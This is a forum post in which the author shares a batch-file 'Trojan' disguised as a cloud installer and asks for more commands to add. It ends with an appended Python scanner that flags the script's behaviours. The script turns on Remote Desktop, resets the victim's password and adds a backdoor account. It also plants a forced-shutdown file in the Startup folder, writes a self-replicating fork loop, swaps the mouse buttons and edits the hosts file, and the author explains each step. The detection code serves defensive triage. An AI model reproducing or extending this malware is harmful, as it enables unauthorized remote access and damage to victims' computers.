I have programmed a "small" batch Trojan.
I can't think of any more commands. Does anyone have an idea what I could add?
By the way, the Trojan is called "Roemer" (inspired by "Trojan") and is "disguised" as a cloud installer.
(The Trojan is still being converted to .exe)
About the code: I often use "cd." because the "starter" (of the Trojan) may have put the Trojan in a folder that is packed inside another folder, etc.
@echo off
title Cloudinstaller V.0.6
set newline = ^ & echo.
cls
echo Run as admin! / Open as an admin!
pause> NUL
cls
echo Username / Username (Example: Timon)
set / P "HUH =>"
cls
netsh advfirewall firewall set rule group = "Remote Desktop" new enable = yes
reg add "HKLM \ System \ CurrentControlSet \ Control \ Terminal Server" / v fDenyTSConnections / t REG_DWORD / d 0 / f
CD.
CD.
CD.
CD.
CD.
CD.
CD.
CD.
CD.
cd C: \ Users \% HUH% \ AppData \ Roaming \ Microsoft \ Windows \ Start Menu \ Programs \ Startup
echo shutdown -s -t 60> Friendly.bat
net user% HUH% heiligeroemer
net user Roemer roman empire / add
echo start hoesmad.bat> hoesmad.bat
Rundll32 user32, SwapMouseButton
cd C: \ Users \% HUH% \ Desktop
CD.
CD.
CD.
CD.
CD.
CD.
CD.
CD.
CD.
CD.
CD.
CD.
CD.
CD.
CD.
CD.
CD.
CD.
cd windows
cd System32
cd drivers
cd etc
echo 127.0.0.1 http://www.netflix.com/...etflix.com >> hosts
echo 127.0.0.1 http://www.youtube.com/...outube.com >> hosts
echo 127.0.0.1 http://www.instagram.com/...tagram.com >> hosts
echo 127.0.0.1 http://www.twitter.com >> hosts
cls
echo process completed.
pause> NUL
Explanations: So netsh advfirewall firewall set rule group = "Remote Desktop" new enable = yes
and
reg add "HKLM \ System \ CurrentControlSet \ Control \ Terminal Server" / v fDenyTSConnections / t REG_DWORD / d 0 / f
are there to activate or allow the "remote host connection".
Later I added a user so that I can get access to the user and then get access to the "main user".
If you know the person you "infected" personally, I have had the password changed.
Mouse buttons are changed.
There's an "infinite CPU overload".
Websites are blocked (btw, if someone knows the command to block programs or a command that closes when the program is opened, write to me).
The "victim device" is shut down after 60 seconds.
Maybe I'll add the taskkill / F / Fi "status eq running" command, but the last one.
I thank you for the help.
Scriptkiddie.
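For anyone who has to triage a script like the one posted above, here is an added example (not part of the original post): a static scanner that flags the behaviours the post describes, namely Remote Desktop being switched on, an account being added, hosts-file redirects, the mouse-button swap, a batch file that restarts itself, and script files written while the working directory is a Startup folder. The rule names, the `triage` function and the sample lines are assumptions made for this illustration; the sample is constructed from the post's lines with placeholder account and host names.

```python
import re

# Patterns run against each line lowercased with ALL whitespace removed, so
# odd spacing ("/ v", "HKLM \ System") does not hide a command from the rules.
RULES = {
    "rdp_firewall_opened": re.compile(r"netshadvfirewall.*remotedesktop.*enable=yes"),
    "rdp_enabled_registry": re.compile(r"regadd.*terminalserver.*fdenytsconnections.*/d0"),
    "account_added": re.compile(r"^netuser.+/add"),
    "hosts_redirect": re.compile(r"^echo(127\.0\.0\.1|0\.0\.0\.0).*>>.*hosts$"),
    "mouse_buttons_swapped": re.compile(r"rundll32.*swapmousebutton"),
    "self_spawning_batch": re.compile(r"^echostart(\S+\.bat)>\1$"),
}
STARTUP = r"startmenu\programs\startup"
SCRIPT_DROP = re.compile(r">[^>]*\.(bat|cmd|vbs|ps1)$")

def triage(script_text):
    """Return (line_number, finding) pairs for a batch script, in file order."""
    findings = []
    in_startup = False  # True while the working directory is a Startup folder
    for lineno, raw in enumerate(script_text.splitlines(), 1):
        norm = re.sub(r"\s+", "", raw).lower()
        if norm.startswith(("cd", "chdir")):
            in_startup = STARTUP in norm  # any other cd is treated as leaving it
            continue
        for name, rx in RULES.items():
            if rx.search(norm):
                findings.append((lineno, name))
        if in_startup and SCRIPT_DROP.search(norm):
            findings.append((lineno, "startup_folder_drop"))
    return findings

# Constructed sample (placeholder user, account and host; spacing as in the post).
SAMPLE = r"""@echo off
netsh advfirewall firewall set rule group = "Remote Desktop" new enable = yes
reg add "HKLM \ System \ CurrentControlSet \ Control \ Terminal Server" / v fDenyTSConnections / t REG_DWORD / d 0 / f
cd C: \ Users \ example \ AppData \ Roaming \ Microsoft \ Windows \ Start Menu \ Programs \ Startup
echo shutdown -s -t 60> Friendly.bat
net user exampleacct ExamplePass1 / add
echo start hoesmad.bat> hoesmad.bat
Rundll32 user32, SwapMouseButton
cd C: \ Users \ example \ Desktop
echo 127.0.0.1 www.example.com >> hosts
echo done> notes.bat"""

if __name__ == "__main__":
    for lineno, name in triage(SAMPLE):
        print(f"line {lineno}: {name}")
```

The last sample line writes a `.bat` file outside the Startup folder and is deliberately not flagged, which shows the directory tracking at work.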